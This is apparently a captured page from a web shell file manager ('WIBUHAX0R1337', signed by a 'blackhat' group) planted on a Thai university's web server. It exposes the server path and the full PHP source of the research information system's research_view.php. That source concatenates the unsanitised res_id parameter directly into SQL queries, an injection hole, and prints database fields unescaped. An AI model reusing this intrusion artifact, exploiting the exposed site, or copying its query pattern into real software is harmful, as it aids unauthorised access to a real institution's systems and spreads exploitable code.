-
✘✘✘ WIBUHAX0R1337 ✘✘✘
-
✘
PATCH :
/
var
/
www
/
clients
/
client4
/
web4
/
web
/
ris
/
Upload File:
files >> /var/www/clients/client4/web4/web/ris/research_view.php
<?php include "_lib.php"; $res_id = $g_util->getParam('res_id', '0'); ?> <!DOCTYPE html> <html lang="en"> <head> <title>ระบบสาระสนเทศงานวิจัย สถาบันวิจัยและพัฒนา มหาวิทยาลัยราชภัฏศรีสะเกษ </title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" type="image/x-icon" href="images/logo.ico"> <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"> <link rel="stylesheet" href="includes/font-awesome/css/font-awesome.min.css"> <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Sans+Thai&display=swap"> <style> body,h1,h2,h3,h4,h5 {font-family: 'Noto Sans Thai', sans-serif; color:#333333;} body {font-size:16px;} *{margin: 0; padding: 0; box-sizing: border-box; list-style: none; text-decoration: none; font-family: 'Noto Sans Thai', sans-serif;} .w3-half img{margin-bottom:-6px;margin-top:16px;opacity:0.8;cursor:pointer} .w3-half img:hover{opacity:1} .ris-dark {background-color:#232659; color:#FFF;} .ris-light {color:#f4c213;} .ris-hover:hover {background-color:#f4c213!important; color:#232659!important;} .ris-active {background-color:#f4c213; color:#232659;!important} .ris-link {color:#000088!important;} .ris-link-hover:hover {color:#880000!important;} </style> </head> <body> <!-- Sidebar/menu --> <nav class="w3-sidebar ris-dark w3-collapse w3-top w3-padding" style="z-index:3;width:250px;" id="mySidebar"><br> <a href="javascript:void(0)" onclick="w3_close()" class="w3-button w3-hide-large w3-display-topleft" style="width:100%;font-size:22px">X</a> <div class="w3-container"> <h3 class="w3-padding-16 ris-light" style="font-weight: bold;">RIS SSKRU</h3> </div> <div class="w3-bar-block"> <a href="index.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-home" aria-hidden="true"></i> หน้าหลัก</a> <a href="researches.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-active"><i class="fa fa-file-text-o" aria-hidden="true"></i> งานวิจัย</a> <a href="researchers.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-users" aria-hidden="true"></i> นักวิจัย</a> <a href="publications.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-newspaper-o" aria-hidden="true"></i> การตีพิมพ์</a> <a href="innovations.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-cogs" aria-hidden="true"></i> นวัตกรรมและสิ่งประดิษฐ์</a> <a href="areas_of_operation.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-globe" aria-hidden="true"></i> พื้นที่ดำเนินการ</a> <a href="admin.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-user-secret" aria-hidden="true"></i> ผู้ดูแลระบบ</a> </div> </nav> <!-- Top menu on small screens --> <header class="w3-container w3-top w3-hide-large w3-red w3-xlarge w3-padding"> <a href="javascript:void(0)" class="w3-button w3-red w3-margin-right" onclick="w3_open()">☰</a> <span></span> </header> <!-- Overlay effect when opening sidebar on small screens --> <div class="w3-overlay w3-hide-large" onclick="w3_close()" style="cursor:pointer" title="close side menu" id="myOverlay"></div> <!-- !PAGE CONTENT! --> <div class="w3-main" style="margin-left:250px;margin-right:0px"> <div class="w3-bottombar" style="padding-top:20px;padding-bottom:20px"> <div class="w3-row"> <div class="w3-col" style="width:140px"><img src="images/logo.png" class="w3-image w3-padding"></div> <div class="w3-rest"><br><h3>ระบบสารสนเทศงานวิจัย สถาบันวิจัยและพัฒนา มหาวิทยาลัยราชภัฏศรีสะเกษ<br> Research Information System(RIS)</h3></div> </div> </div> <div class="w3-panel"> <a href="index.php" class="ris-link ris-link-hover">หน้าหลัก</a> > <a href="researches.php" class="ris-link ris-link-hover">งานวิจัย</a> > รายละเอียดงานวิจัย </div> <p> </p> <?php $sql = "SELECT research.*, researcher.tname AS researcher_tname, researcher.name AS researcher_name, faculty.name AS faculty_name FROM research LEFT JOIN researcher ON (research.researcher_id=researcher.id) LEFT JOIN faculty ON (research.faculty_id=faculty.id) WHERE research.id='".$res_id."' "; //echo $sql; $row = $g_db->getObject($sql); $sql = "SELECT * FROM fund WHERE id='".$row->fund_id."' "; $fund = $g_db->getObject($sql); ?> <h3 class="w3-center w3-margin"><?=$row->title?></h3> <div class="w3-row-padding w3-margin w3-border-top"> <div class="w3-twothird w3-padding-16"> <div class="w3-panel"> <a href="researcher_info.php?res_id=<?=$row->researcher_id?>" class="w3-large ris-link ris-link-hover"><?=$row->researcher_tname?> <?=$row->researcher_name?></a> </div> <div class="w3-panel"> <?=$row->faculty_name?> </div> <div class="w3-panel"> คำสำคัญ <?=$row->keyword?> </div> <div class="w3-panel"> เลขทะเบียน <?=$row->reg_no?> </div> <div class="w3-panel"> บทคัดย่อ <?=$row->abstract?> </div> <div class="w3-panel"> Abstract <?=$row->abstract_en?> </div> <div class="w3-panel"> ไฟล์งานวิจัย <?=$row->file?> </div> </div> <div class="w3-third w3-padding"> <div class="w3-panel w3-center"> <img src="pics/fund/<?=$fund->logo?>" class="" style="max-width: 100px;"> </div> <div class="w3-panel" style="font-weight:bold;"> <?=$fund->name?> </div> <div class="w3-panel"> <?=$fund->address?> </div> <div class="w3-panel"> <a href="<?=$fund->website?>" target="_blank" class="ris-link ris-link-hover"><?=$fund->website?></a> </div> <div class="w3-panel"> <?=$fund->tel?> </div> <div class="w3-panel"> <?=$fund->email?> </div> </div> </div> <?php include("footer.php"); ?> </div> <script> // Script to open and close sidebar function w3_open() { document.getElementById("mySidebar").style.display = "block"; document.getElementById("myOverlay").style.display = "block"; } function w3_close() { document.getElementById("mySidebar").style.display = "none"; document.getElementById("myOverlay").style.display = "none"; } // Modal Image Gallery function onClick(element) { document.getElementById("img01").src = element.src; document.getElementById("modal01").style.display = "block"; var captionText = document.getElementById("caption"); captionText.innerHTML = element.alt; } </script> </body> </html> <?php $g_db->close(); ?>
2022 - 2023 Copyright By Lutfifakee || Padang Blackhat ♥